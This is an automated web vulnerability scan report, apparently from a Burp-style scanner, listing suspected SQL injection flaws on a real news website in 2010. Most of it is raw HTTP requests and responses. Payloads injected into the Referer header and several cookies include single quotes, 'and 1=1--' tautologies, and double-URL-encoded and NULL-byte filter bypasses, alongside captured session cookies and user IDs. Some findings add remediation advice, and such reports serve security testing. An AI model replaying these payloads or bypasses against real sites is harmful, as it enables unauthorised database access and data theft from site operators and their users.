<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='LUCKNOW, India—Police were questioning two brothers for their alleged involvement in ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /nation-world/ci_16797757 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI''; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/nation-world/ci_16797757?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:43:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:43:19 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 447
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /news/ci_16800002 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=%2527
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The Santa Clara County Board of Supervisors voted unanimously to cap the unused days of vac ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]...
Request 2
GET /news/ci_16800002 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=%2527%2527
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/news/ci_16800002?ncl ...[SNIP]...
The currBrandCheck cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the currBrandCheck cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /opinion/ci_16791987 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews'%20and%201%3d1--%20; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 1 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/opinion/ci_16791987?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:43:48 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:43:48 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 442
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/opinion/ci_16791987?nclick_check=1&forced=true">here</a>.</p> <hr> <address>Apache/2.0.52 (Red Hat) Server at www.mercurynews.com Port 80</address> </body></html>
Request 2
GET /opinion/ci_16791987 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews'%20and%201%3d2--%20; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='How often has some government authority told us "We cant do it," but the public persisted and it got done after all?'><meta name="keywords" content="opinion editorials letters to the editor steve wright"/><title>Opinion: Keep digging for San Jose's best high-speed rail options - San Jose Mercury News</title><script language="JavaScript"> document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/mercury/favicon.ico" type="image/x-icon">'); document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/mercury/favicon.ico" type="image/x-icon">'); </script>
<script src="http://extras.mnginteractive.com/live/js/Brightcove/MercuryNews/MobileCompatibility.js"></script> <Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "mercurynews.Opinion.Front"; var CM8Profile=""; </script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmai ...[SNIP]...
The UserID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the UserID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /opinion/ci_16792028 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI%2527; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Day 1 for the 28 first-term members of the Assembly and 10 members of the Senate who were s ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]...
Request 2
GET /opinion/ci_16792028 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI%2527%2527; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/opinion/ci_16792028?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:44:08 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:44:08 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 442
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The fPage cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fPage cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /opinion/ci_16792028 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false%00'; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Day 1 for the 28 first-term members of the Assembly and 10 members of the Senate who were s ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]...
Request 2
GET /opinion/ci_16792028 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false%00''; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/opinion/ci_16792028?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:44:16 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:44:16 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 442
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The fcspersistslider1 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fcspersistslider1 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /opinion/ci_16792028 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1'; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Day 1 for the 28 first-term members of the Assembly and 10 members of the Senate who were s ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]...
Request 2
GET /opinion/ci_16792028 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1''; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/opinion/ci_16792028?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:44:54 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:44:54 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 442
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The s_cc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_cc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /opinion/ci_16792028 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true%00'; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Day 1 for the 28 first-term members of the Assembly and 10 members of the Senate who were s ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]...
Request 2
GET /opinion/ci_16792028 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true%00''; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/opinion/ci_16792028?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:44:28 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:44:28 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 442
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /opinion/ci_16798841 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q='
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='As Speaker John A. Pérez reconvened the California Assemblys biennial session Mon ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]... <p>"We will not stand idly by while others force parents back onto the welfare rolls and drive providers to the unemployment line," Pérez said. "Failing to act will cost taxpayers far more than the cost of providing child care." </p> ...[SNIP]...
Request 2
GET /opinion/ci_16798841 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=''
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/opinion/ci_16798841? ...[SNIP]...
The s_cc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_cc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the s_cc cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
